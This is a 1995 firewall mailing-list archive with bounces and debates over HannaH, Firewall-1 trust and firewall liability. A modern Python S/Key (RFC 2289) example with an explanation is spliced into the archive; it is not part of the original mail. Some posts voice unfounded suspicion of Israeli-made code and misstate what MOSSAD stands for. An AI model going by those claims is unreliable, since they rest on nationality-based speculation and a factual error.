SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: gary flynn Date: Fri, 1 Sep 1995 10:00:21 -0400 Subject: Re: HannaH from SecureWare Inc. > > > This Hannah product looks like what I've been looking for. It puts > > "network security" where it belongs...on the nodes. I liken this > [...] > > It seems so simple that someone else would have thought of it sooner. 
> From firewalls-owner Fri Sep 8 01:00:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09991 for firewalls-outgoing; Fri, 8 Sep 1995 00:29:38 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA09984 for ; Fri, 8 Sep 1995 00:29:35 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id bm19077; 7 Sep 95 18:57 EDT Received: by ncrgw1.ATTGIS.COM; 4 Sep 95 03:04:44 EDT Received: by ncrhub4.ATTGIS.COM; 4 Sep 95 03:04:17 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 4 Sep 95 03:00:33 EDT Subject: MMUG mail warning Date: Mon, 4 Sep 95 03:04:00 EDT Message-ID: <9509071857.bm19077@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. 
---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 1 Sep 95 23:09:56 EDT Received: by ncrhub4.ATTGIS.COM; 1 Sep 95 22:55:41 EDT Received: by ncrgw1.ATTGIS.COM; 1 Sep 95 22:55:12 EDT Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP id QQzfju15345; Fri, 1 Sep 1995 22:31:37 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA29960 for firewalls-digest-outgoing; Fri, 1 Sep 1995 19:03:40 -0700 Date: Fri, 1 Sep 1995 19:03:40 -0700 Message-Id: <199509020203.TAA29960@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #512 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Friday, 1 September 1995 Volume 04 : Number 512 In this issue: Re: Security Paradigms (was HannaH) Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: Use of Remote Authentication: tacacs/radius/etc... Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: Placement of WWW Server - any thoughts? Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. how to close socket Re: HannaH from SecureWare Inc. Re: DNS forwarding problem linux vs. *bsd for secure networking system Re: DNS forwarding problem snprintf() See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: gary@habanero.jmu.edu Date: Fri, 1 Sep 95 14:08:10 -0400 Subject: Re: Security Paradigms (was HannaH) > These people are not "trained", like Topsy they "just happen". WE CANNOT AFFORD > TO TRAIN THEM. 
We do not have the resources, or the time, or the "lost From firewalls-owner Fri Sep 8 02:00:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA12930 for firewalls-outgoing; Fri, 8 Sep 1995 01:35:40 -0700 Received: from gatepas.gc.ca (gatepas.gc.ca [192.197.79.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA12923 for ; Fri, 8 Sep 1995 01:35:33 -0700 Reply-To: Peter.BEAN@ldn01.x400.gc.ca Date: Fri, 08 Sep 1995 08:20:02 +0000 Priority: normal Content-Identifier: OLIVETTI-MAIL3.0 X400-Content-Type: P2-1984 X400-MTS-Identifier: [/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/;995:950908082002] From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES) To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #517 Message-Id: <995*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS> Importance: normal In-Reply-To: <199509080735.AAA10119*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am away from the office until Monday, 18 September 1995 From firewalls-owner Fri Sep 8 04:00:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA15055 for firewalls-outgoing; Fri, 8 Sep 1995 03:51:53 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA15047 for ; Fri, 8 Sep 1995 03:51:48 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id ew20580; 7 Sep 95 19:34 EDT Received: by ncrgw1.ATTGIS.COM; 5 Sep 95 03:12:56 EDT Received: by ncrhub4.ATTGIS.COM; 5 Sep 95 03:12:37 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 5 Sep 95 03:04:17 EDT Subject: MMUG mail warning Date: Tue, 5 Sep 95 03:12:00 EDT Message-ID: <9509071934.ew20580@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to 
peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. ---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 3 Sep 95 01:48:58 EDT Received: by ncrhub4.ATTGIS.COM; 3 Sep 95 01:35:21 EDT Received: by ncrgw1.ATTGIS.COM; 3 Sep 95 01:35:11 EDT Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP id QQzfnx19337; Sun, 3 Sep 1995 01:15:40 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA24562 for firewalls-digest-outgoing; Sat, 2 Sep 1995 22:01:01 -0700 Date: Sat, 2 Sep 1995 22:01:01 -0700 Message-Id: <199509030501.WAA24562@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #513 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Saturday, 2 September 1995 Volume 04 : Number 513 In this issue: snprintf.c and SunOS 5.4 re: snprintf(), SMURF, & Jules Own Version... re: snprintf(), SMURF, & Jules Own Version... Subject: Re: using suns/sunos for gateway host(s) Re: FW: Programming Re: FW: Programming Re: Use of Remote Authentication: tacacs/radius/etc... Re: DNS forwarding problem Large-Mixed-OS FW access problem Re: HannaH from SecureWare Inc. RADIUS... Where is it? Large-Mixed-OS FW access problem Frame-Relay Net Connections See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. 
---------------------------------------------------------------------- From: "Kenneth Kron" Date: 1 Sep 1995 19:24:39 -0800 Subject: snprintf.c and SunOS 5.4 Patrick, Thanks for the snprintf source, FYI -- In order to compile your snprintf on SunOS 5.4 I had to From firewalls-owner Fri Sep 8 04:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA15314 for firewalls-outgoing; Fri, 8 Sep 1995 04:09:09 -0700 Received: from gate.personal-media.co.jp (gate.personal-media.co.jp [202.33.97.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA15307 for ; Fri, 8 Sep 1995 04:09:05 -0700 Received: (from ishikawa@localhost) by gate.personal-media.co.jp (8.6.12+2.4W3/3.3W5-gate-mx) id UAA15419; Fri, 8 Sep 1995 20:05:30 +0900 Date: Fri, 8 Sep 1995 20:05:30 +0900 From: Chiaki Ishikawa Message-Id: <199509081105.UAA15419@gate.personal-media.co.jp> To: Firewalls@GreatCircle.COM In-reply-to: <199509080735.AAA10119@miles.greatcircle.com> (firewalls-digest-owner@GreatCircle.COM) Subject: Re: S/Key for little endian machine Reply-to: ishikawa@personal-media.co.jp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PMC e-mail id: 3966 Thanks to the direct response from Daniel O'Callaghan, I found out that all I need to do to change the S/KEY behavior is to define MPU8086 on the cc command line. (This will take care of the endian problem. There are other tweaks necessary for Solaris 2.4 for X86 on iApx86.) -- Chiaki Ishikawa ishikawa@personal-media.co.jp Personal Media Corp. 
Shinagawa, Tokyo, Japan 141 From firewalls-owner Fri Sep 8 05:02:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA16059 for firewalls-outgoing; Fri, 8 Sep 1995 04:51:14 -0700 Received: from gmap-gw.leeds.ac.uk (gmap15.leeds.ac.uk [129.11.84.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA16052 for ; Fri, 8 Sep 1995 04:51:08 -0700 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id MAA02337 for ; Fri, 8 Sep 1995 12:26:11 +0100 Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id MAA22811; Fri, 8 Sep 1995 12:49:26 +0100 From: Danny Cox Date: Fri, 8 Sep 1995 12:45:48 +0100 Message-Id: <5290.9509081145@gmap.leeds.ac.uk> X-Planation: X-Faces images can be viewed with the XFaces program To: firewalls@greatcircle.com Subject: upgrade to commercial firewalls Cc: dannyc@gmap3 X-Sun-Charset: US-ASCII X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt; Fri, 8 Sep 1995 04:47:26 -0700 Received: by datasrv.co.il id AA25207 (5.65c/IDA-1.4.4 for firewalls@greatcircle.com); Fri, 8 Sep 1995 13:45:48 +0300 Date: Fri, 8 Sep 1995 13:45:46 +0300 (IDT) From: ORMAT Subject: Re: Firewall-1 concerns To: firewalls@greatcircle.com In-Reply-To: <199509072140.XAA16451@utopia.hacktic.nl> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 7 Sep 1995, Anonymous wrote: [snip] > I'm afraid that companies may look at the Sun firewall-1 product and > think that Sun has inspected the code for trapdoor and such in the code > that may have put there under orders from the Masad.In fact, I heard > one person say that in looking at the binary there is very suspicious > code. > > It turns out that Sun does not have the source and hasn't inspected it. 
> hope that the US military and other sensitive agencies or companies > with sensitive information aren't using this product for protection. > > It may be that the Masad has free reign to get into you network! > > Someone very concerned > 1. It's Mosad and not Masad 2. I wish someone would tell me about all those conspiracies I'm supposed to be a part of. 3. The question here is a legit one, how can you trust a firewall when you don't know what the code looks like? 4. Posting from an anon account won't stop the Masad from finding you, and now that you've blown their cover, I guess they'll have to kill you. Arik From firewalls-owner Fri Sep 8 05:22:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA16135 for firewalls-outgoing; Fri, 8 Sep 1995 04:53:23 -0700 Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA16128 for ; Fri, 8 Sep 1995 04:53:20 -0700 Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma026764; Fri Sep 8 07:50:34 1995 Posted-Date: Fri, 8 Sep 1995 07:51:17 -0400 From: "Bryan D. Boyle" Message-Id: <9509080751.ZM23272@maverick.erenj.com> Date: Fri, 8 Sep 1995 07:51:17 -0400 In-Reply-To: David Kovar "Re: Firewall-1 concerns" (Sep 8, 12:41am) References: <199509080441.AAA29335@nda.nda.com> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.1 10apr95) To: firewalls@greatcircle.com Subject: Re: Firewall-1 concerns Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sep 8, 12:41am, David Kovar wrote: > Someone seriously without a clue, is more like it. Oh? 
I think his questioning is a good sign of a healthy respect and paranoia about security and where your protection mechanism comes from. "Trust us, we know what YOU need" is a pile of bull cookies from a vendor. I don't know about you, but I don't believe ANYTHING a vendor tells me unless they are able to
1) independently substantiate their claims
2) prove that independent review of their processes, code, and mechanisms withstood all known and projected attacks
3) allow open and auditable review of their program
4) not claim all sorts of protocol 'extensions and modifications' to supposedly allow non-securable protocols to pass 'securely'. A protocol is either secure or it is not. Securing a corporate network is no place to beta test someone's extensions to a transmission protocol.
5) Work to fit their solution into MY operation, not force MY operation to modify its processes to fit their view of the world.
I don't have to buy from a vendor; the converse is not necessarily the case. I call the shots here. Now, it may be a cultural thing, but the Firewall-1 folks seem to think we are a bunch of oafs here, wet behind the ears, based on my dealings with them. They have never been able to meet any of the tests (regardless of the pretty gui) above. They get defensive, not cooperative, when pushed to substantiate any of the above. It is not a crystal-box solution, it is a textbook example of a black box solution that you are not supposed to understand how it works, what the pitfalls are, or even question whether or not it works properly. We will not even begin to discuss the OS it runs on...which seems to be the ongoing topic of CERT alerts du jour. These are just my observations, and not a secret to the long-time list members. -- Bryan D. Boyle | "It's when you think you've understood a problem #include | thoroughly that you are in real trouble..." 
EMAIL: bdboyle@erenj.com | -Pavel Chichikov ---------------------------------- -------------------- From firewalls-owner Fri Sep 8 08:02:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19449 for firewalls-outgoing; Fri, 8 Sep 1995 07:13:24 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA19440 for ; Fri, 8 Sep 1995 07:13:21 -0700 Received: from uucp4.UU.NET by relay3.UU.NET with SMTP id QQzghs24194; Fri, 8 Sep 1995 10:11:56 -0400 Received: from rsca.UUCP by uucp4.UU.NET with UUCP/RMAIL ; Fri, 8 Sep 1995 10:11:56 -0400 Received: by mailhub.rsca.com (8.6.9/rsca1.1f) id KAA21685; Fri, 8 Sep 1995 10:07:32 -0400 Date: Fri, 8 Sep 1995 10:07:32 -0400 From: Steve Marquess Message-Id: <199509081407.KAA21685@mailhub.rsca.com> To: dannyc@gmap.leeds.ac.uk, firewalls@greatcircle.com Subject: Re: upgrade to commercial firewalls Cc: uunet!gmap3!dannyc@gmap.leeds.ac.uk Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Danny Cox >Date: Fri, 8 Sep 1995 12:45:48 +0100 >To: firewalls@greatcircle.com >Subject: upgrade to commercial firewalls >Cc: uunet!gmap3!dannyc >Sender: firewalls-owner@GreatCircle.COM >Precedence: bulk > >Management here seems to have a healthy attitude to security - bordering on >the paranoid if anything, but willing to spend the money, which is good. > >Just talking now with one of the senior managers .. our current situation is >that I've built a firewall router using SOCKS .. my next step may have been >to upgrade using the TIS fwtk stuff .. > >Interesting comment though from him, which in my naivete I'd not thought >about. If we get attacked and lose software/data etc, then who's liable ? >If we use freeware products, then noone is. If we use a commercial product, >then we can, I guess, sue the firewall supplier ... ? At least that was >his comment, and I'd be very interested to hear what you all think to this >concept. 
>This is based on the idea that they'd be covered by their indemnity >insurance ... > >Thanks all, I appreciate your time, >Danny This exact same point has been raised repeatedly at my company, a large financial services firm with a "healthy bordering on paranoid" concern about security. The ability to assign blame in the event of problems is a very significant consideration in the acquisition of important systems and services. And if you think about it from the management point of view there is a certain logic to it: if we suffer a business loss due to the failure of "home grown" or "roll your own" (terms of disparagement here...) software then the blame must fall on those permitting/approving/performing that software development. If a commercially acquired and configured product failed then it's just "well, vendor X let us down again". A fairly common and believable situation here. The possibility of actually collecting financial damages seems to be less important than the exculpatory assignment of responsibility. I don't think anyone really thinks we could pry money out of a major vendor because of software defects, especially not for incidental damages. Keep in mind also that any significant decisions about deploying a firewall will be made by upper management, all business types far removed from any close appreciation of the technical nuances. With all the confusing and conflicting advice and information they get from vendors, trade rags, and in-house staff they really don't know what to believe. Those of us in the boiler room are close to the issues and have definite opinions, but we are only a small piece of the real decision process. The bigger and better known the vendor the more powerful the attraction of this argument. Hence a strong predisposition to well known and well marketed products, with cost and product quality often very secondary considerations. Steve Marquess steve@tdg.rsca.com Residential Services Corp. 
of America 7445 New Technology Way (301) 815-6219 voice Frederick, MD 21701 (301) 815-6515 fax From firewalls-owner Fri Sep 8 08:31:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19837 for firewalls-outgoing; Fri, 8 Sep 1995 07:41:33 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA19830 for ; Fri, 8 Sep 1995 07:41:30 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id JAA12926 for GreatCircle.COM!firewalls; Fri, 8 Sep 1995 09:28:53 -0500 Received: by ris1.nmti.com (smail2.5) id AA00656; 8 Sep 95 09:04:30 CDT (Fri) Received: by sonic.nmti.com; id AA03877; Fri, 8 Sep 1995 09:31:08 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509081431.AA03877@sonic.nmti.com.nmti.com> Subject: Re: Firewall-1 concerns To: ormat1@zeus.datasrv.co.il (ORMAT) Date: Fri, 8 Sep 1995 09:31:07 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "ORMAT" at Sep 8, 95 01:45:46 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 217 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > 3. The question here is a legit one, how can you trust a firewall when > you don't know what the code looks like? Please, let's not have that flame war again. I think everyone knows the pros and cons by now... 
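Chiaki Ishikawa's note earlier in this digest (building S/Key on a little-endian machine) turns on one detail worth seeing in code: an S/Key one-time password is a 64-bit fold of an MD4 digest, MD4 is defined over 32-bit words, and so every implementation has to pick a byte order when it turns those words into the bytes it folds, chains and prints. RFC 2289 fixes that order as little-endian; a build that uses the host's native order is right on one architecture by accident and produces different passwords on the other, so two such hosts cannot authenticate each other. What follows is an added example, not code from the thread, from the S/Key distribution or from RFC 2289: a self-contained MD4 (many OpenSSL builds no longer expose it to hashlib), the RFC 2289 MD4 one-time-password computation, the server-side check, and a `word_order` switch that models the byte-order pitfall. The switch is a model of the general mistake, not a reproduction of whatever S/Key's MPU8086 define actually toggles; the `seed`, `passphrase` and count values are the RFC 2289 Appendix C test case.

```python
"""RFC 2289 (S/Key) one-time passwords over MD4, plus the byte-order pitfall.

Added example for this thread; not code from the list, from the S/Key
distribution, or from RFC 2289. MD4 is implemented inline because many
OpenSSL builds no longer expose it to hashlib.
"""
import hmac
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4_state(data: bytes):
    """Return the four 32-bit MD4 chaining words (A, B, C, D) for `data`."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (  # (boolean function, additive constant, X[] index order, shifts)
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])  # the standard reads words little-endian
        a, b, c, d = A, B, C, D
        for func, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                t = _rotl((a + func(b, c, d) + X[idx] + k) & _MASK, shifts[i % 4])
                a, b, c, d = d, t, b, c  # rotate roles: the next step updates what was d
        A, B, C, D = (A + a) & _MASK, (B + b) & _MASK, (C + c) & _MASK, (D + d) & _MASK
    return A, B, C, D


def md4(data: bytes) -> bytes:
    """Standard MD4 digest: chaining words serialised little-endian (RFC 1320)."""
    return struct.pack("<4I", *md4_state(data))


def fold64(digest16: bytes) -> bytes:
    """RFC 2289 fold: XOR the first eight digest bytes with the last eight."""
    return bytes(x ^ y for x, y in zip(digest16[:8], digest16[8:16]))


def skey_otp(passphrase: str, seed: str, count: int, word_order: str = "<") -> bytes:
    """64-bit one-time password for sequence number `count`.

    `word_order` is how the MD4 chaining words become the bytes that get folded
    and re-hashed. "<" (little-endian) is what RFC 1320/2289 specify and the
    only value that interoperates. ">" models a build that wrote the words in a
    big-endian host's native order; this is a model of the general mistake,
    not a reproduction of what S/Key's MPU8086 define actually toggles.
    """
    if not 10 <= len(passphrase) <= 63:
        raise ValueError("RFC 2289 pass phrases are 10 to 63 characters")
    fmt = word_order + "4I"
    step = lambda m: fold64(struct.pack(fmt, *md4_state(m)))
    # Initial step: lower-cased seed, then pass phrase (the seed is case-insensitive).
    value = step((seed.lower() + passphrase).encode("ascii"))
    for _ in range(count):  # N further hash-and-fold steps give password number N
        value = step(value)
    return value


def verify_otp(stored: bytes, candidate: bytes) -> bool:
    """Server check. The server keeps the last accepted password (count N);
    the client presents count N-1, so one more hash-and-fold must reproduce it."""
    return hmac.compare_digest(fold64(md4(candidate)), stored)


def otp_hex(otp: bytes) -> str:
    """Format as in the RFC 2289 tables, e.g. 'D185 4218 EBBB 0B51'."""
    s = otp.hex().upper()
    return " ".join(s[i:i + 4] for i in range(0, 16, 4))


if __name__ == "__main__":
    pw, seed = "This is a test.", "TeSt"  # RFC 2289 Appendix C test case
    for n in (0, 1, 99):
        print(n, otp_hex(skey_otp(pw, seed, n)), "host-order build:",
              otp_hex(skey_otp(pw, seed, n, ">")))
    server = skey_otp(pw, seed, 99)  # last password the server accepted
    print("login with #98:", verify_otp(server, skey_otp(pw, seed, 98)))
    print("replay of #97: ", verify_otp(server, skey_otp(pw, seed, 97)))
```

Run as a script it prints the standard passwords for counts 0, 1 and 99 next to what a host-order build would have produced for the same secret, then shows the verifier accepting the next password in the chain and rejecting an older one. The lesson for the list thread is the first column: the only thing that makes an S/Key client on Solaris x86 agree with a server on a SPARC is that both serialise the hash words the way the specification says, never the way the CPU happens to lay them out.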
From firewalls-owner Fri Sep 8 09:00:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA21707 for firewalls-outgoing; Fri, 8 Sep 1995 08:46:02 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA21688 for ; Fri, 8 Sep 1995 08:45:57 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id IAA09003; Fri, 8 Sep 1995 08:34:48 -0700 Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma009001; Fri Sep 8 08:34:45 1995 Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id IAA00508; Fri, 8 Sep 1995 08:32:15 -0700 Date: Fri, 8 Sep 1995 08:32:15 -0700 From: Brian Murrell Message-Id: <199509081532.IAA00508@mocha.bctel.net> To: firewalls@GreatCircle.COM, dannyc@gmap.leeds.ac.uk Subject: Re: upgrade to commercial firewalls Cc: gmap3!dannyc@uunet.uu.net X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Interesting comment though from him, which in my naivete I'd not thought > about. If we get attacked and lose software/data etc, then who's liable ? Oh goody. I'd love to see this one hashed out, although I think it'll be relevant to firewalls for a day or two tops. :-) > If we use freeware products, then noone is. If we use a commercial product, > then we can, I guess, sue the firewall supplier ... ? At least that was > his comment, and I'd be very interested to hear what you all think to this > concept. This is based on the idea that they'd be covered by their indemnity > insurance ... Good luck. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. 
brian@wimsey.com 604 454 5262 From firewalls-owner Fri Sep 8 09:03:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA22435 for firewalls-outgoing; Fri, 8 Sep 1995 09:00:38 -0700 Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA22403 for ; Fri, 8 Sep 1995 09:00:25 -0700 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id KAA13930; Fri, 8 Sep 1995 10:27:56 -0400 Date: Fri, 8 Sep 1995 10:27:56 -0400 From: Ted Doty Message-Id: <199509081427.KAA13930@kgbvax.network.com> To: steve@rsca.com, dannyc@gmap.leeds.ac.uk, firewalls@greatcircle.com Subject: Re: upgrade to commercial firewalls In-Reply-To: Mail from 'Steve Marquess ' dated: Fri, 8 Sep 1995 10:07:32 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve Marquess writes: > >From: Danny Cox > > > >Interesting comment though from him, which in my naivete I'd not thought > >about. If we get attacked and lose software/data etc, then who's liable ? > >If we use freeware products, then noone is. If we use a commercial product, > >then we can, I guess, sue the firewall supplier ... ? At least that was > >his comment, and I'd be very interested to hear what you all think to this > >concept. This is based on the idea that they'd be covered by their indemnity > >insurance ... > > This exact same point has been raised repeatedly at my company, a large financial > services firm with a "healthy bordering on paranoid" concern about security. > The ability to assign blame in the event of problems is a very significant > consideration in the acquisition of important systems and services. And if [snip] So long as people keep thinking that a magic box will solve all their present and future security worries, assigning blame is a somewhat humorous exercise in futility. Also, as long as 80% (or whatever the current number is ... 
send your flames to /dev/null) of all "break-ins" are internal, and as long as only 5% (same comment as above) of all corporate security policies are detailed enough to actually implement something from, you probably are barking up the wrong tree. Most of the security consultants will tell you that a firewall will help, but your security is ultimately your own responsibility. Get a policy, implement it, track it, tell your users what it is, keep your eye on bugtraq, (...) and you'll be in pretty good shape. This doesn't mean that you won't get hacked, or that you won't lose data (you mean that disaster recovery isn't in your policy either?). Without the above, liability is probably hard to demonstrate. -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblance to real opinions, living or dead, is purely coincidental. 
From firewalls-owner Fri Sep 8 09:31:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA22977 for firewalls-outgoing; Fri, 8 Sep 1995 09:24:10 -0700 Received: from svcs1.digex.net (svcs1.digex.net [204.91.197.224]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA22969 for ; Fri, 8 Sep 1995 09:24:07 -0700 Received: from paragon-systems.com (sundevil.paragon-systems.com [199.125.207.2]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id MAA29333; Fri, 8 Sep 1995 12:22:27 -0400 Received: from sandfiddler.paragon-systems.com by paragon-systems.com (4.1/SMI-4.1) id AA01287; Fri, 8 Sep 95 12:25:18 EDT Received: by sandfiddler.paragon-systems.com (5.x/SMI-SVR4) id AA00414; Fri, 8 Sep 1995 12:17:45 -0400 Date: Fri, 8 Sep 1995 12:17:45 -0400 From: rmck@sandfiddler.paragon-systems.com (Bob McKisson) Message-Id: <9509081617.AA00414@sandfiddler.paragon-systems.com> To: nobody@REPLAY.COM, proff@suburbia.net Subject: Re: Firewall-1 concerns Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > It may be that the Masad has free reign to get into you network! To the guy who just woke up to the fact that FW-1 is Israeli code, don't feel stupid by yourself, pal. If you can believe this, the Department of Defense Comptrollers Office just bought one of those things on the advice of one of the biggest and best-known government information system security experts on the Beltway. Defense finance information being protected by Israeli code. In my view it ain't the MOSSAD (Ministry of State Security and Defense) you should be worried about. 
